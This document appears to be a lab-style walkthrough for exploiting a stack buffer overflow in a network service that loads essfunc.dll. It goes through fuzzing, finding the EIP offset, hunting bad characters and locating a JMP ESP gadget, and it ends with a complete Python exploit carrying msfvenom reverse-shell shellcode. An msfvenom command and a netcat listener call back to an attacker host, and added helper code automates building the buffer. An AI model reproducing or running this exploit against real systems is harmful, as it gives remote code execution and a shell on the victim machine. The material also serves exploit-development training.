# Brainstorm

Fuzzing: check whether we can overflow the buffer. The service asks for a username and then a message; the message is the field we try to overflow, so send a large block of "A"s there and watch whether the process crashes in the debugger.

```python
import socket
import sys

# Bytes, not str: sockets send bytes and the later steps need raw values.
username = b"pika"
message = b"A" * 4000

try:
    print("sending payload...")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.0.101', 9999))
    # s.recv(1024)   # banner and username prompt, if you want to read them
    # s.recv(1024)
    s.sendall(username + b'\r\n')
    s.recv(1024)
    s.sendall(message + b'\r\n')
    s.recv(1024)      # empty or reset here usually means the service crashed
    s.close()
except OSError as e:
    print("Cannot connect:", e)
    sys.exit(1)
```

Use msf-pattern\_create to generate a unique cyclic pattern and send it in place of the block of "A"s. Every 4-byte window of the pattern is unique, so the value that lands in EIP tells you exactly where in the buffer the overwrite starts.

```
msf-pattern_create -l 5000
```

Read the value in the EIP register after the crash, then use msf-pattern\_offset to find where that 4-byte sequence sits in the pattern. The debugger shows EIP as a little-endian dword and msf-pattern\_offset accounts for that. With the offset of 2012 used in the rest of this page, the pattern bytes at that position are `0Cp1`, so EIP reads 31704330:

```
msf-pattern_offset -l 5000 -q 31704330
```

This reports an exact match at offset 2012.
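As an added example that is not part of the original page: the cyclic-pattern algorithm behind msf-pattern\_create and msf-pattern\_offset, in Python, so the offset step can be reproduced and checked without Metasploit. It uses the same Aa0Aa1...Aa9Ab0 ordering (digit changes fastest) and converts the EIP value shown by the debugger back into the four bytes in memory before searching, which is the step that is easy to get wrong by hand.

```python
import string
import struct

# Character sets in msf-pattern_create order: uppercase, lowercase, digit.
SETS = (string.ascii_uppercase, string.ascii_lowercase, string.digits)


def pattern_create(length: int) -> bytes:
    """Cyclic pattern in msf-pattern_create order: Aa0Aa1...Aa9Ab0...
    Every 3-byte group is unique for the first 26*26*10*3 = 20280 bytes,
    which is plenty for the 5000-byte pattern used on this page."""
    out = bytearray()
    while len(out) < length:
        for a in SETS[0]:
            for b in SETS[1]:
                for c in SETS[2]:
                    out += (a + b + c).encode()
                    if len(out) >= length:
                        return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(query: bytes, length: int = 5000) -> int:
    """Position of `query` in a pattern of `length` bytes, or -1 (msf-pattern_offset -q)."""
    return pattern_create(length).find(query)


def eip_to_bytes(eip: int) -> bytes:
    """The debugger shows EIP as a dword. x86 is little-endian, so the byte that
    overwrote the lowest address is the last pair of hex digits on screen."""
    return struct.pack("<I", eip)


def offset_from_eip(eip: int, length: int = 5000) -> int:
    """Offset to EIP straight from the crash value, e.g. 0x31704330 -> 2012."""
    return pattern_offset(eip_to_bytes(eip), length)


if __name__ == "__main__":
    print(pattern_create(5000)[:30].decode())
    print("offset:", offset_from_eip(0x31704330))
```

`offset_from_eip` returns -1 when the value is not in the pattern, which usually means EIP was not overwritten by your data at all (partial overwrite, or the crash was somewhere else); check the stack and the other registers before trusting an offset.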

Now use this offset: pad with 2012 bytes of "A" and follow with four "B"s (0x42). If the offset is right, the four "B"s land exactly in EIP.

```python
import socket
import sys

username = b"pika"
# 2012 bytes of padding reach EIP; the next four bytes overwrite it.
message = b"A" * 2012 + b"B" * 4

try:
    print("sending payload...")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.0.105', 9999))
    # s.recv(1024)
    # s.recv(1024)
    s.sendall(username + b'\r\n')
    s.recv(1024)
    s.sendall(message + b'\r\n')
    s.recv(1024)
    s.close()
except OSError as e:
    print("Cannot connect:", e)
    sys.exit(1)
```

Check that EIP now reads 42424242. Next, find the bad characters: byte values the service drops, alters, or truncates on, which therefore must not appear in the shellcode or the return address. \x00 is bad by default because it terminates C strings, so the test list starts at \x01. Everything after the "B"s lands on the stack where ESP points, which is where the list will be visible.

```python
import socket
import sys

username = b"pika"
message = b"A" * 2012 + b"B" * 4
# Every byte value except \x00, as bytes so nothing is re-encoded on the way out.
badchars = (b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

try:
    print("sending payload...")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.0.105', 9999))
    # s.recv(1024)
    # s.recv(1024)
    s.sendall(username + b'\r\n')
    s.recv(1024)
    s.sendall(message + badchars + b'\r\n')
    s.recv(1024)
    s.close()
except OSError as e:
    print("Cannot connect:", e)
    sys.exit(1)
```
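Before comparing the dump by eye, an added example that is not part of the original page: generating the candidate list instead of typing it, and the compare-and-repeat loop that the "Follow in Dump" check performs. `toy_service_dump` is a constructed stand-in for the debugger's memory view; it pretends the service drops every \x0a, purely so the loop has something to converge on. On the real target the dump comes from Immunity, and this page finds only \x00 to be bad.

```python
def badchar_candidates(exclude) -> bytes:
    """Every byte value except those already known to be bad (the list on this page, with \\x00 left out)."""
    return bytes(b for b in range(256) if b not in exclude)


def first_mismatch(sent: bytes, dumped: bytes):
    """First byte of `sent` that is not intact at the same position in the dump, or None.
    Only the first is reported: once one byte is dropped, everything after it
    shifts and would show up as false positives."""
    for i, b in enumerate(sent):
        if i >= len(dumped) or dumped[i] != b:
            return b
    return None


def hunt_badchars(dump_for, known=(0x00,)) -> set:
    """Send, compare, exclude the newly found bad byte, and repeat until the dump
    matches what was sent. `dump_for` returns what the debugger shows at ESP."""
    bad = set(known)
    while True:
        sent = badchar_candidates(bad)
        missing = first_mismatch(sent, dump_for(sent))
        if missing is None:
            return bad
        bad.add(missing)


def as_python_literal(data: bytes, per_line: int = 16) -> str:
    """Format bytes as the multi-line b"\\x.." literal used in the scripts on this page."""
    lines = []
    for i in range(0, len(data), per_line):
        chunk = data[i:i + per_line]
        lines.append('b"' + "".join(f"\\x{b:02x}" for b in chunk) + '"')
    return "\n".join(lines)


def toy_service_dump(sent: bytes) -> bytes:
    """CONSTRUCTED stand-in for 'Follow in Dump': this fake service stops copying at
    the first \\x00 and drops every \\x0a. Real behaviour is observed in the debugger."""
    return sent.split(b"\x00", 1)[0].replace(b"\x0a", b"")


if __name__ == "__main__":
    print(as_python_literal(badchar_candidates({0x00})))
    print("bad:", sorted(hex(b) for b in hunt_badchars(toy_service_dump)))
```

The one-at-a-time rule matters: a byte that is dropped shifts the rest of the sequence, and a byte that is altered in place (for example a case conversion) only mismatches itself, so always re-send after each exclusion rather than reading several "bad" bytes off a single dump.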

Right-click ESP and choose Follow in Dump. Compare the bytes in the dump with the list that was sent: a byte that is missing, altered, or after which the sequence stops is a bad character. Remove it from the list and resend until the whole sequence appears intact. Next, restart the service under Immunity Debugger and, in the command bar at the bottom, type

```
!mona modules
```

This lists the loaded modules with their protections. Pick a module that shows False across the board (no Rebase, SafeSEH, ASLR or NXCompat, and not an OS DLL), so that its addresses are the same on every run; here that is essfunc.dll. Then search it for a JMP ESP instruction, whose opcode bytes are \xff\xe4:

```
!mona find -s "\xff\xe4" -m essfunc.dll
```

Check the Results section and note one of the addresses it returns. Restart the service, click the blue arrow (go to address) in the toolbar and enter the address; the debugger jumps to that instruction, which should read JMP ESP. Press F2 to set a breakpoint there, then run the following script. (Return address: 625014DF, which must be written into the buffer little-endian as \xdf\x14\x50\x62.)

```python
import socket
import sys

username = b"pika"
# 625014DF (JMP ESP in essfunc.dll) written little-endian, since x86 stores
# the lowest byte of the address first.
message = b"A" * 2012 + b"\xdf\x14\x50\x62"

try:
    print("sending payload...")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.0.105', 9999))
    # s.recv(1024)
    # s.recv(1024)
    s.sendall(username + b'\r\n')
    s.recv(1024)
    s.sendall(message + b'\r\n')
    s.recv(1024)
    s.close()
except OSError as e:
    print("Cannot connect:", e)
    sys.exit(1)
```

Check that EIP has been overwritten with the return address and that the status bar at the bottom says **Breakpoint at essfunc.625014DF.** Execution is paused on the JMP ESP, so whatever sits at ESP (the bytes right after the return address) will run next; that is where the shellcode goes. Now create an msfvenom payload for a reverse shell. Pass every bad character found earlier with -b so the encoder avoids them, and set LHOST and LPORT to your listener:

```
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker IP> LPORT=<port> -b "\x00" -f c
```

(-f py prints the same shellcode as a Python bytes literal, which pastes straight into the script below. The shellcode below was generated for the author's LHOST/LPORT, so regenerate it for yours.)

Start a listener on the chosen port (for example `nc -lvnp <port>`), then run the following script to get a shell. The 32 NOPs between the return address and the shellcode give the encoder's decoder stub some clearance, since it unpacks the payload on the stack right where ESP points.

```python
import socket
import sys

username = b"pika"
# padding to EIP | JMP ESP (625014DF, little-endian) | NOP sled | shellcode
message = b"A" * 2012 + b"\xdf\x14\x50\x62" + b"\x90" * 32
payload = (b"\xbf\x6f\x90\x2c\xf7\xda\xdd\xd9\x74\x24\xf4\x5d\x33\xc9\xb1"
b"\x52\x31\x7d\x12\x03\x7d\x12\x83\x82\x6c\xce\x02\xa0\x65\x8d"
b"\xed\x58\x76\xf2\x64\xbd\x47\x32\x12\xb6\xf8\x82\x50\x9a\xf4"
b"\x69\x34\x0e\x8e\x1c\x91\x21\x27\xaa\xc7\x0c\xb8\x87\x34\x0f"
b"\x3a\xda\x68\xef\x03\x15\x7d\xee\x44\x48\x8c\xa2\x1d\x06\x23"
b"\x52\x29\x52\xf8\xd9\x61\x72\x78\x3e\x31\x75\xa9\x91\x49\x2c"
b"\x69\x10\x9d\x44\x20\x0a\xc2\x61\xfa\xa1\x30\x1d\xfd\x63\x09"
b"\xde\x52\x4a\xa5\x2d\xaa\x8b\x02\xce\xd9\xe5\x70\x73\xda\x32"
b"\x0a\xaf\x6f\xa0\xac\x24\xd7\x0c\x4c\xe8\x8e\xc7\x42\x45\xc4"
b"\x8f\x46\x58\x09\xa4\x73\xd1\xac\x6a\xf2\xa1\x8a\xae\x5e\x71"
b"\xb2\xf7\x3a\xd4\xcb\xe7\xe4\x89\x69\x6c\x08\xdd\x03\x2f\x45"
b"\x12\x2e\xcf\x95\x3c\x39\xbc\xa7\xe3\x91\x2a\x84\x6c\x3c\xad"
b"\xeb\x46\xf8\x21\x12\x69\xf9\x68\xd1\x3d\xa9\x02\xf0\x3d\x22"
b"\xd2\xfd\xeb\xe5\x82\x51\x44\x46\x72\x12\x34\x2e\x98\x9d\x6b"
b"\x4e\xa3\x77\x04\xe5\x5e\x10\xeb\x52\x60\x85\x83\xa0\x60\x5b"
b"\x35\x2c\x86\x09\xa5\x78\x11\xa6\x5c\x21\xe9\x57\xa0\xff\x94"
b"\x58\x2a\x0c\x69\x16\xdb\x79\x79\xcf\x2b\x34\x23\x46\x33\xe2"
b"\x4b\x04\xa6\x69\x8b\x43\xdb\x25\xdc\x04\x2d\x3c\x88\xb8\x14"
b"\x96\xae\x40\xc0\xd1\x6a\x9f\x31\xdf\x73\x52\x0d\xfb\x63\xaa"
b"\x8e\x47\xd7\x62\xd9\x11\x81\xc4\xb3\xd3\x7b\x9f\x68\xba\xeb"
b"\x66\x43\x7d\x6d\x67\x8e\x0b\x91\xd6\x67\x4a\xae\xd7\xef\x5a"
b"\xd7\x05\x90\xa5\x02\x8e\xa0\xef\x0e\xa7\x28\xb6\xdb\xf5\x34"
b"\x49\x36\x39\x41\xca\xb2\xc2\xb6\xd2\xb7\xc7\xf3\x54\x24\xba"
b"\x6c\x31\x4a\x69\x8c\x10")

try:
    print("sending payload...")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.0.105', 9999))
    # s.recv(1024)
    # s.recv(1024)
    s.sendall(username + b'\r\n')
    s.recv(1024)
    s.sendall(message + payload + b'\r\n')
    s.recv(1024)
    s.close()
except OSError as e:
    print("Cannot connect:", e)
    sys.exit(1)
```
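As an added example that is not part of the original page, the return-address step and the final script above can be folded into a builder that assembles the buffer and checks it before anything is sent. It assumes the values found on this page (offset 2012, JMP ESP at 625014DF in essfunc.dll, \x00 as the only bad character). `STAND_IN_SHELLCODE` is a constructed placeholder of INT3 breakpoints, not real shellcode; swap in the msfvenom output. `send_exploit` is a hypothetical helper mirroring the page's scripts, and the target address is the one the page uses.

```python
import socket
import struct

OFFSET = 2012                 # bytes before EIP, from the pattern_offset step
JMP_ESP = 0x625014DF          # JMP ESP in essfunc.dll, from !mona find
BADCHARS = frozenset({0x00})  # result of the badchar step on this page
NOP_SLED = 32

# Constructed stand-in for the msfvenom shellcode: eight INT3 breakpoints.
# With this in place a working chain stops in the debugger right after the JMP ESP.
STAND_IN_SHELLCODE = b"\xcc" * 8


def p32(value: int) -> bytes:
    """Pack a 32-bit address little-endian, as it must sit in memory on x86."""
    return struct.pack("<I", value)


def bad_bytes_in(data: bytes, bad=BADCHARS) -> list:
    """Bad characters present in `data`, sorted; an empty list means clean."""
    return sorted({b for b in data if b in bad})


def build_buffer(shellcode: bytes, offset=OFFSET, ret=JMP_ESP,
                 nops=NOP_SLED, bad=BADCHARS) -> bytes:
    """padding | return address | NOP sled | shellcode, refusing any bad byte.
    The return address is checked too: a gadget whose address contains a bad
    character would be mangled just like the shellcode."""
    for label, part in (("return address", p32(ret)), ("shellcode", shellcode)):
        found = bad_bytes_in(part, bad)
        if found:
            raise ValueError(f"{label} contains bad chars: {[hex(b) for b in found]}")
    return b"A" * offset + p32(ret) + b"\x90" * nops + shellcode


def eip_bytes(buf: bytes, offset=OFFSET) -> bytes:
    """The four bytes that land in EIP, for checking the layout before sending."""
    return buf[offset:offset + 4]


def send_exploit(host: str, port: int, buf: bytes, username: bytes = b"pika") -> None:
    """Hypothetical sender following the page's scripts: username first, then the message."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(username + b"\r\n")
        s.recv(1024)
        s.sendall(buf + b"\r\n")


if __name__ == "__main__":
    buf = build_buffer(STAND_IN_SHELLCODE)
    print("EIP bytes:", eip_bytes(buf).hex(), "total length:", len(buf))
    # send_exploit("192.168.0.105", 9999, buf)   # target address taken from this page
```

Running the builder with the INT3 stand-in first is a cheap sanity check: if the debugger stops on `INT3` immediately after the breakpoint at 625014DF, the offset, return address and stack layout are all right, and any later failure is in the shellcode or the listener rather than the overflow.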

